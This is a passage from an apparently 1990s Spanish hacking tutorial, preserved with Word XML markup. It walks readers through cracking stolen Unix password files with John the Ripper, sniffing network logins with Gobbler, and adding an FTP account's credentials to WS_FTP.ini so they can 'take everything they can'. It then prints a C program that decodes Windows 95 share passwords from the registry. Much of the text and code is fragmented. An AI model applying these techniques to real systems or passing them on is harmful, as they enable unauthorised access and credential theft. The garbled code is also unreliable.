user(s) only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shells:[!]&lt;shell&gt;[,..] crack users with this (these) shell(s) only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salts:[!]&lt;count&gt;      crack salts with at least &lt;count&gt; accounts only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lamesalts              assume plaintext passwords were used as salt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timeout:&lt;time&gt;         abort session after a period of &lt;time&gt; minute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list                   list each word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beep -quiet            beep or don't beep when a password is found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noname -nohash        don't use memory for login names or hash tables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-des -md5               force DES or MD5 mod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eis? :), y como siempre no explicare que es cada opcion os lo dejo pa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jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero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ello escogermos la opcion "single", ya que el john no nos pedi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 fichero de diccionario, si fuese el caso que no tenemos, ponem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john -single passw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el John se pondra a trabajar, cuando halla acabo creara un ficher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lamado "John.pot" donde se almacenaran los passwords encriptados co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 correspodiente passwords desencriptado (esta definicion no es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odo correcta pero es para que lo entendais) y ya tenemos unas cuent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acceso al servid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metodo va bien para la primera pasado con el John pero luego convien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sar un diccionario y con el diccionario seria de la siguiente maner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john -wordfile:spain.txt passwd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John seguiria el mismo proceso antes descrito, por supuesto si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chero "John.pot" esta creado ya, les a¤adira los resultados obtenid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 este fichero, por cierto este fichero tiene atributo de solo lectur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es aqui se acaba la explicacion del John, que seguro que ya aprenderei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 manejar correctamente. Referente a los diccionarios hay vari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erramientas que corren bajo MS-DOS que crean diccionarios o tambi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deis buscar por Internet ya que hay varios web's llenos de diccionari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d. Gobbler v 2.1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olvemos a la carga con otro programa que no es del win95 propiamente, per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 un sniffer que podemos usar bajo win95 en una red Ethernet. Un Sniffe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aquellos que no sepan, es un programa que captura los paquetes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san por una red y asi se pueden conseguir logins, passowrds u otro tip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informacion que querramos, logicamente si los paquetes estan encriptados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o dificultara el proceso, ya que habra que desencriptarlos si se puede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siempre abrimos una ventana y ejecutamos el programa de la sigui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aner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&gt;gobble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se activara el programa y veremos una serie de ventanas, en este punto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lsamos el &lt;ESC&gt; y saldra una ventana con un menu. Ahora tenemos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figurar el programa para nuestra red, la verdad es que es muy sencill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utilizar, con un poco de practica dominaremos este sniffer facilmente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sugerencia conviene leer el fichero de documentacion que trae, y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explica como configurar el program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e. Modificando el WS_FTP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famoso cliente ftp WS_FTP, se le puede a¤adir un host remoto el cua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conde mucho software interesante. Esta opcion no esta por defecto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mplemente hay que a¤adir una lineas en el fichero "WS_FTP.ini"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enemos que a¤adir, al principio del ficher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[208.128.143.19]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OST=24.48.3.45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ID=cm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WD=636E79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LMASK=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MASK=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RETRIES=2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ASVMODE=0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OMMENT=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mple, verdad? Pues ahora cuando le digamos al cliente que se diriga a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ost 208.128.143.19 (que no es la dirrecion real, pero da igual). Pu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os divertais con esta cuenta :) y coged todo lo que podais, por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 saber cuanto tiempo estara vig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f. Sharepassw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programa desencripta el passorwd de win95. Esta en lenguaje C, com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pongo todo el mundo tiene que tener un compilador en C y si no ya est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scando uno, que hay muchos y gratis por Internet. No veo la necesidad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explicaros el programa ya que tambien incluyo la explicacion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utor la cual esta muy bien, logicament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* This program takes an 'encrypted' Windows 95 share password and decrypts i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Look at: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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMa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o find a machine's shares.  Within the data for each share are tw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registry entries, Parm1enc and Parm2enc.  Parm1enc is the "Full access"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password.  Parm2enc is the "Read only" password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David Ross  2/9/96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snakey@cs.umd.edu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Do not distribute this program for any commercial purpose without firs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contacting me for permission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DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!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 technical description of the 'code' can be found later on in thi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* document.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Oh yeah...  a totally unsolicited self promotion here...  If anyone ha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 job for a junior year Computer Science student for summer '96, plea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* let me know!  I'm familiar with Windows and Mac networking (especially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nvolving TCP/IP), fluent in C and C++, and working on becoming a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proficient Windows programmer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include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#include &lt;string.h&gt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define BUFFER 3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DecodeCharOne(unsigned char *);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int DecodeCharTwo(unsigned char *);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int DecodeCharThree(unsigned char *);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int DecodeCharFour(unsigned char *);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int DecodeCharFive(unsigned char *);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int DecodeCharSix(unsigned char *);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int DecodeCharSeven(unsigned char *);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>int DecodeCharEight(unsigned char *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main() {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;           /* Generic counter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eocc = 0;    /* Records if there has been an error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* The following structure stores the encoded bytes.  Decoded valu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 replace the encoded values as the decoding process moves along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 The initial values show here are not used and are unimportant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char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a }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short tempshort;   /* Used as a go-between from sscanf() to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> mybytes[] so unaligned data accesses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> don't occur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goupto = 0;  /* Records how many characters there are to be decoded */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* The following code handles input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har inpt[BUFFER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har *inptptr;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ntf("Input the byte code in hex (ex: 76 d5 09 e3): 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gets(inpt, BUFFER, stdin);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ptptr = strtok(inpt, " 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inpt[0] != '\n'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while ((inptptr != NULL) &amp;&amp; (goupto &lt; 8)) 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scanf(inptptr, "%hx", &amp;tempshort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mybytes[goupto++] = tempshort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nptptr = strtok(NULL, " "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* Decode all the characters.  I could have made this stop immediately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 after an error has been found, but it really doesn't matte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!DecodeCharOne(&amp;mybytes[0])) eocc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!DecodeCharTwo(&amp;mybytes[1])) eocc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!DecodeCharThree(&amp;mybytes[2])) eocc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!DecodeCharFour(&amp;mybytes[3])) eocc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!DecodeCharFive(&amp;mybytes[4])) eocc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!DecodeCharSix(&amp;mybytes[5])) eocc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!DecodeCharSeven(&amp;mybytes[6])) eocc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!DecodeCharEight(&amp;mybytes[7])) eocc = 1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* If the password could be decoded, print it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eocc) printf("The encrypted password is invalid.\n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intf("The decoded password is: \""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 (i = 0; i &lt; goupto; i++) printf("%c",mybytes[i]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printf("\"\n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  /* End of main()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 will document this function, but not the seven other function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which decode the subsequent seven characters.  All of these function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re essentially the same.  Multiple functions are necessary though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because each column of the password has a different set of encoding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patterns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 following section will attempt to explain the encoding schem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for share passwords as stored in the Windows 95 registry.  I wil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ry to explain this as clearly as I can, however I really have n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background in encryption.  If you have any questions, please fe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free to send them to me at snakey@cs.umd.edu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First off, share passwords can be anywhere from one character t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eight.  "Read only" passwords and "Full access" passwords both u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 same encoding scheme, and so they both can be decoded by thi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program.  There is a one-to-one relationship between the number of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characters in a password and the number of bytes in the encoded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password stored in the registry.  In fact, each encoded byte directl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corresponds to the letter in the corresponding column of th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unencoded password!  Ie: If I change a password "passwd" to "masswd"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only the first byte of the encrypted password will change.  Knowing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is, it is easy to see that all that needs to be done to deco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 password is to find a mapping from an encoded byte to a decoded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letter.  That's what this program does.  Unfortunately, things ge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 little tricky because a letter in the first column of a password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s encoded using a slightly different algorithm than a letter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n the second column, and so on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re is another complexity which we do not really need to worr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bout to a great extent, but we still need to be aware of.  Man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characters, when entered into a password, map to the same encoded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byte.  The best example of this is that both 'A' and 'a' are th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same as far as share passwords are concerned.  There are numerou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other examples of this, and this allows us to effectively limit th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range of characters we need to be able to decode.  The range of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SCII values we will have to be able to decode turns out to b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from 32 to 159.  ASCII values higher than 159 tend to map t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encoded bytes which also represent more normal ASCII values.  S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f a user manages to create a password with high ASCII value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n it, that password will still be decoded by this program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lthough the decoded password won't look the same as the original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t will work just as well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With all of the preliminaries out of the way, I can now move o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o describing the mapping from an encoded byte to it's corresponding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SCII value.  I think the best way to describe this would be through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 picture of exactly how the characters from 32 to 63 are mapped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out in the code for the first letter in a password.  This table goe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beyond the 80 column format maintained in the rest of this document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but it is really the best solution.  If the table below doesn't look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right, load this file up in a text editor that supports greater tha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80 columns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  Encoded byte (hex)    - 1F 1E 1D 1C 1B 1A 19 18 17 16 15 14 13 14 11 10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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>0F OE 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00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  ASCII value (decimal) - 42 43 40 41 46 47 44 45 34 35 32 33 38 39 36 37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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>58 59 56 57 62 63 60 61 50 51 48 49 54 55 52 53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  Pair #                - |_6_| |_5_| |_8_| |_7_| |_2_| |_1_| |_4_| |_3_|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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>|14_| |13_| |16_| |15_| |10_| |_9_| |12_| |11_|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  Quad #                - |__________2__________| |__________1__________|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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>|__________3__________| |__________4__________|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  32 byte block #       - |______________________________________________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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1______________________________________________|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 "Pair #", "Quad #", and "32 byte block #" rows each are there t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make the general ordering of the code more visible.  The first thing t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note is that the range of encoded byte values runs from 00 to 1f.  Thi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will not always be the case for the first set of 32 characters.  I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fact, the next set of 32 characters (ASCII 64 to ASCII 95) is not i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 range of 20 to 3f in encoded form.  I never concerned myself with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predicting exactly where each of the four 32 byte ranges are aligned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within the range of 0 to 256.  In my decoding scheme, I simply specify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 location of the first character in a 32 byte block (which I hav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pre-determined via experimentation) and determine the locations of th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rest of the characters in the block relative to the inital value.  Thi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mounts to a total of four hand-decoded characters for the entire code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From a starting point which is given (in this case the fact that ASCII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32 is encoded as 0x15), my decoding scheme follows a pattern that i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probably already apparent to you if you have examined the above tabl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closely.  First, if the encoded byte number is odd, it simple subtract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one from this byte number to get the byte number of the encoded form of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 subsequent character.  This is much more simple than it sounds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s an example, given that the code for ASCII 32 is 0x15, the program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knows that the code for ASCII 33 must be 0x14.  The tricky part is tha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is is not always true for every code.  Recall that there is a differen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coding scheme for each of the 8 columns in a password, and that the abov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able only describes the coding scheme for the first column.  Other column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reverse this relationship between the two ASCII values of a certain pair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Pairs are grouped into units of four, appearing in a predefined pattern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n this case, the first pair (by first I mean the pair with the lowes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set of ASCII values) is put in the second slot of a quad (which contain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four pairs).  The second pair is put in the first slot, the third is pu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n the fourth quad, and the fourth is put in the third quad.  This changes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depending on the specific code used (of the 8 possible)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Quads also fill a block in the same manner, however the ordering is NO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necessarily the same as the way pairs fit into quads!  As I described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above, there are four blocks, and they fit into the entire range of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128 values just as pairs fit into quads and quads fit into blocks,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via a pattern determined by whoever invented this encoding scheme.  I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s important to realize that the range of 128 possible encoded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values can be anywhere within the range of 0 to 256.  Ie: One block can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be positioned from 0x00 to 0x1f, while another block in the same cod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can be positioned from 0xa0 to 0xbf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 realize that the above description is a bit complex, and it doesn'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really cover much of _how_ my program decodes the the encoded values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If you honestly can't understand a word I've said, just go back to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 table and really take a long look at it.  Print it out, put it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under your pillow when you go to sleep.  Sooner or later the order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of it all will dawn on you and you should be able to step through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my code and see how it derives its answer, at least for th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DecodeCharOne() routine.  Seven other tables (which I have rough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copies of here on notebook paper) were needed to come up with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 the seven other decoders for the seven other character places.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DecodeCharOne(unsigned char *mychar)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 = 0;        /* Keeps track of the decoded character # minus 32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cletter = 1;  /* Sets the current letter of the 8 char quad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1 = 1;  /* Sets the current quad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2 = 1;  /* Sets the current 32 char block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retval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* We are on this col of the table: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char code = 0x15;    /* The code for a space */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/* This is the main loop.  It walks through each decoded character, find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 its corresponding encoded value, and looks to see if that's the same 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 the encoded value we are looking for.  If it is, we have found our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 decoded character!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i&lt;256) &amp;&amp; (code != *mychar)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 (cletter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+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-= 5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=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8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 = 1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witch (blockl1) {    /* After we hit character number 8, we have */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1:               /* to do a relative jump to the next quad */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>code += 11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2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>code -= 21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3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>code += 11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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>blockl1 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>switch (blockl2) {       /* After we hit the last quad, we have to */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>case 1:                  /* jump to the next 32 character block. */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0x75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2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0x55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3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0xb5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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0x15;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  blockl2 = 1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++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i == 256) retval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*mychar = i + 32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tval;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}  /* End of DecodeCharOne()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DecodeCharTwo(unsigned char *mychar)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cletter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1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2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retval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char code = 0xba;    /* The code for a space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i&lt;256) &amp;&amp; (code != *mychar)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 (cletter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-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+= 5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-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8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 = 1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witch (blockl1) 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ab/>
        <w:t>code -= 11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2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>code -= 11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3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>code -= 11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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>blockl1 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>switch (blockl2) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>case 1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0xda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2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0xfa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3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0x1a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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0xba;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  blockl2 = 1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++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i == 256) retval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*mychar = i + 32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tval;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}  /* End of DecodeCharTwo()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DecodeCharThree(unsigned char *mychar)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cletter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1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2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retval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char code = 0x6d;    /* The code for a space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i&lt;256) &amp;&amp; (code != *mychar)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 (cletter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+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-= 5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+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8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 = 1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witch (blockl1) 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-= 5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+= 27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lockl1++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-= 5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lockl1++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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>blockl1 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>switch (blockl2) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>case 1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0x0d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2d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++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cd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++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case 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0x6d;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  blockl2 = 1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++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i == 256) retval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*mychar = i + 32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tval;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}  /* End of DecodeCharThree()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DecodeCharFour(unsigned char *mychar)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cletter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1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2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retval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char code = 0x86;    /* The code for a space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i&lt;256) &amp;&amp; (code != *mychar)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 (cletter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-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-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-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8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 = 1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witch (blockl1) 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+= 13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+= 13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lockl1++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+= 13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lockl1++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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>blockl1 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>switch (blockl2) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab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e6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c6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++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26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++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case 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0x86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 = 1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++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i == 256) retval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*mychar = i + 32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tval;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}   /* End of DecodeCharFour()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DecodeCharFive(unsigned char *mychar)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cletter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1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2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retval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char code = 0x73;    /* The code for a space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i&lt;256) &amp;&amp; (code != *mychar)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 (cletter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+= 7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8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 = 1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witch (blockl1) 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+= 7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-= 25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lockl1++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+= 7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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>blockl1 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>switch (blockl2) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab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13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33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++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23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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0x73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 = 1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++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i == 256) retval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*mychar = i + 32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tval;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}    /* End of DecodeCharFive()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DecodeCharSix(unsigned char *mychar)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cletter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1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2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retval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char code = 0x89;    /* The code for a space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i&lt;256) &amp;&amp; (code != *mychar)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 (cletter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+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+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+= 3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--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8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 = 1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witch (blockl1) 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-= 13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2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>code += 19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-= 13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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>blockl1 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>switch (blockl2) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab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e9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c9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29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4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0x89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 = 1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++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i == 256) retval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*mychar = i + 32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tval;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}     /* End of DecodeCharSix()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DecodeCharSeven(unsigned char *mychar)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cletter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1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2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retval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char code = 0xf4;    /* The code for a space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i&lt;256) &amp;&amp; (code != *mychar)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witch (cletter) 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4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 -= 7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5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6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7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ase 8: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letter = 1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witch (blockl1) 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+= 9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2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>code -= 23;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code += 9;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>blockl1++;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ase 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>blockl1 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>switch (blockl2) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab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94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b4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code = 0x54;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  blockl2++;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  break;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>case 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve">  code = 0xf4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lockl2 = 1;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break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++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i == 256) retval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*mychar = i + 32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tval;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>}   /* End of DecodeCharSeven()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t DecodeCharEight(unsigned char *mychar) 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i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cletter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1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blockl2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retval = 1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signed char code = 0x4a;    /* The code for a space */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i&lt;256) &amp;&amp; (code != *mychar)) {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switch (cletter) {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se 1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se 2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de -= 3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se 3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se 4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de += 5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se 5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se 6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de -= 3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se 7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ode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letter++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case 8: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letter = 1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switch (blockl1) {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ase 1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> code -= 11;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> blockl1++;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t xml:space="preserve"> break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ase 2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Textosinformato"/>
        <w:rPr/>
